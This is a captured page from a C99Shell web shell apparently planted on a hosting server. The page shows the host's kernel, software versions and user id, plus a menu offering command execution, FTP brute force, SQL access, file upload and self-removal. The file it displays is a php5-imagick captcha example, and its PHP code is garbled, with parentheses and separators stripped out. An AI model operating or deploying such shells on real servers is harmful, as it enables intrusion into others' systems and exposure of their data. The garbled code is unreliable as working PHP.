!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/usr/share/doc/php5-imagick/examples/   drwxr-xr-x
Free 1.45 GB of 7.22 GB (20.03%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     captcha.php (1.57 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
    A very primitive captcha implementation
*/

/* Create Imagick object */
$Imagick = new Imagick();

/* Create the ImagickPixel object (used to set the background color on image) */
$bg = new ImagickPixel();

/* Set the pixel color to white */
$bg->setColor'white' );

/* Create a drawing object and set the font size */
$ImagickDraw = new ImagickDraw();

/* Set font and font size. You can also specify /path/to/font.ttf */
$ImagickDraw->setFont'/usr/share/fonts/truetype/ttf-dejavu/DejaVuSans.ttf' );
$ImagickDraw->setFontSize20 );

/* Create the text */
$alphanum 'ABXZRMHTL23456789';
$string substrstr_shuffle$alphanum ), 2);

/* Create new empty image */
$Imagick->newImage8530$bg ); 

/* Write the text on the image */
$Imagick->annotateImage$ImagickDraw4200$string );

/* Add some swirl */
$Imagick->swirlImage20 );

/* Create a few random lines */
$ImagickDraw->linerand070 ), rand030 ), rand070 ), rand030 ) );
$ImagickDraw->linerand070 ), rand030 ), rand070 ), rand030 ) );
$ImagickDraw->linerand070 ), rand030 ), rand070 ), rand030 ) );
$ImagickDraw->linerand070 ), rand030 ), rand070 ), rand030 ) );
$ImagickDraw->linerand070 ), rand030 ), rand070 ), rand030 ) );

/* Draw the ImagickDraw object contents to the image. */
$Imagick->drawImage$ImagickDraw );

/* Give the image a format */
$Imagick->setImageFormat'png' );

/* Send headers and output the image */
header"Content-Type: image/{$Imagick->getImageFormat()});
echo 
$Imagick->getImageBlob( );

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0121 ]--